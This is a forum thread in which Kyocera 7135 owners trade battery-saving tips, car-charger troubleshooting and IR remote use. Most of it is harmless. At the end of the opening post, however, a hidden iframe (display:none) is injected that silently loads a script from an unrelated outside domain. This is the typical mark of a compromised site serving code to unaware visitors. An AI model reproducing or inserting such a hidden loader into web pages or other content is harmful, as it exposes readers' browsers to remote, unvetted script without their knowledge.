+ Reply to Thread
Page 1 of 2 1 2 LastLast

Best Ways to Conserve Battery

I have had my phone for about a week now and just had the need to charge the phone after 3 days of moderate emails, data calls as well as general exploration of various programs from my 6035. Since the 6035 is my "standard" for good battery life and I've slimmed that phone down to be as conservative with the battery as possible. What are some of the best ways to help with the moderate battery life of my 7135? I would love a good list from you all and hopefully help extend those 3 days to a good 5.

And also, I was wondering whether having the SD card in the phone drains the battery in any way?

Thanks in advance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Be glad you get 3 I get one, however using it heavily.

Administrator
    don't stay in fringe areas for any length of time.

keep analog usage down to a minimum...

keep the back-light time down...

mp3 use will drain the battery (power using the head phones)

talk time...

these factors will cause your battery usage to fluctuate with use... :Smoke:

I have found with very little palm useage and virtually no phone useage (on but not used from 6 am to 11 pm), I can just barely get the battery to last the weekend. Buy a spare....

if you have a car charger i assume charging the unit constantly your battery life should be fine with one battery?

Dreaderus

Originally posted by dreaderus
    if you have a car charger i assume charging the unit constantly your battery life should be fine with one battery?

Dreaderus
    Actually I have been meaning to post about this, when I plug into my car charger, the bars move however the phone does not charge, it also doesnt seem to discharge. I recently was in the car for over two hours with the phone in the charger. When I left I was down two bars and when I got there and unplugged the phone, it still had the 2 bars missing. I have not found the car charger to be consistent and I use it every day for an hour to and an hour from work. :complain

Originally posted by boinker
    I have not found the car charger to be consistent and I use it every day for an hour to and an hour from work. :complain
    You may want to try either a new car charger............. or a new car

I also charge mine in the car most days on the way home... and it works every time
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    You may want to try either a new car charger............. or a new car
    LOL, thanks maybe I can get that A4 I saw in another thread with his car kit!

Do you have a get connected Kyo? I am just wondering as there are a few versions out there now. I bought mine from GC back in December so its one of the originals. I hope it is just the car kit and if you have an original as well I will go ahead and order one. I know there was some talk in other threads about firmware or other updates that may help.

Also, Robert do you have the car kit with the speaker and mike or just the car power adapter? Thanks

ep
    Originally posted by boinker
    ... the bars move however the phone does not charge, it also doesnt seem to discharge.
    Get a DC voltmeter and measure the voltage of the car charger. Then compare that voltage with that of your wall charger that came with the phone.

If your car charger is less then your wall charger, it will make the bars scroll, but will reach a limit that it can power up your battery. You can sustain a charge, but not go over.

If it isn't enough power, I'd return the charger to the manufacturer. I had to do this with my 6035. They whined, but I was able to get a replacement from them with the proper voltage and it was all good.
    --ep

Battery Life Issues

I am barely getting a days worth of battery life out of my 7135, and that is with no calls, and little usage. I am on a Verizon Network out here.

I am using LauncherIII, and have installed the following:

OmniRemote Pro, Die Roller, Dice Man 2, YAUC, Parking Lot, Dope Wars and then the standard stuff that came with it.

All I can think of is:

1. That's just how bad the battery is
    2. There's something wrong with my battery
    3. LauncherIII is sucking power somehow
    4. My phone is using power switchin from analog to digital over and over each day
    5. If the battery wasn't an issue, then the phone would be perfect and we can't have that now, can we?

I did a search on the boards for battery, and couldn't find any answers, so I thought I would ask you all.

Thanks.

If you are spending a lot of time in analog areas, it will defenitly suck the life out of the battery pretty quick.

I am convinced that low signal strengh will too, but others have disagreed with me, so I won't put money behind it.

Even in optimal conditions, the battery life is not great. It certainly isn't a StarTac, but then again, it's not a StarTac...

Alan

What kind of battery life are you other owners experiencing?

Does anyone know if there is a 'high-capacity' battery that will come out for this?

Having the 6035 spoiled me when it came to battery life!

Be sure to put the brightness to about 1/4 and adjust the contrast for better viewing. That markedly improved my battery life. Also, turn the screen off when talking and be sure the beam is "off" to save power. These little tricks really help!

I turned my brightness down all the way and the screen is still *very* readable....

Analog will definitely suck life out. I concur with Alanb that low signal strength will drain it too. I have much better life at home (four bars) than at the office (0-1 bars). You didn't say how long you've had the phone, either. It'll take a couple of weeks before you're getting optimum life. I noticed a significant improvement after I'd had the phone for a couple of weeks.

Somewhere on this board someone has mentioned that Kyocera is planning an extended life battery.
    ---------------
    The same thing we do every night, Pinky...

Is it possible that the amount of software affects the battery life. I watched my battery life go from 2 days to about 1.5 days, HOWEVER, I make a lot of calls(I'm an installation contractor for Alltel) and I have begun to use my 7135 to check my email. If you are roaming, this too will shorten your battery life. I hope this helps. BTW, I too have been looking for a battery with greater capacity, but all I have found were batteries on Ebay and those being aftermarket. I personally will not try an aftermarket battery as the performance in other phones has been poor.
    James Kendricks

Thanks!

I turned my brightness waaaay down, and that seems to be working already.

How does turning the beam off help? Does the phone scan for beams or something? I figured that the ir beam didn't drain the battery unless you were beaming/receiving/remote controlling something...

That is wierd that the performance increases after a couple of weeks. I have had mine for about 4 days now.

(I just configured OmniRemote Pro to work my TV- awesome!!)

A friend of mine has a Nextel phone, and he says he has to charge his everyday, something about the network he says.

I think I will get a second battery, and maybe a second charger plug to keep at work.

Thanks again, I am really glad this forum is here!

Administrator
    mp3 usage will drain the batery.

ir being set to "on" will search for a ir beam constantly.. just a little juice saved there if you turn it off.

Talon_Wolfe

What is the range of your IR port using OmniRemote?

Originally posted by dgelfuso
    Talon_Wolfe

What is the range of your IR port using OmniRemote?
    I get at least 10 feet.

Alan